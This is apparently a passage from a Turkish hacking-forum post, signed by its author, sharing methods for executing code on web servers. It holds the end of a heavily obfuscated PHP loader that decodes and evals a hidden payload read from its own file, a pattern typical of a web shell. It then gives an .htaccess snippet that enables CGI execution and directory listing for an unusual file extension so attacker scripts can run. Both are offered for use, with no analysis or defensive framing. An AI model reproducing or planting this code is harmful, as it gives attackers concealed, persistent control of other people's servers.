*/$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x107c;eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NGM0KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdFbnRlcnlvdXdraFJIWUtOV09VVEFhQmJDY0RkRmZHZ0lpSmpMbE1tUHBRcVNzVnZYeFp6MDEyMzQ1Njc4OSsvPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='));return;?>~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alVnRPIq[/code]

4.	YÖNTEM => .htaccess
[code]Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .izri

AddHandler cgi-script .pl
AddHandler cgi-script .pl[/code]

Bence bu kadar yeter. Doküman tamamen bana aittir. KingSkrupellos. Lütfen Emeğe Saygı.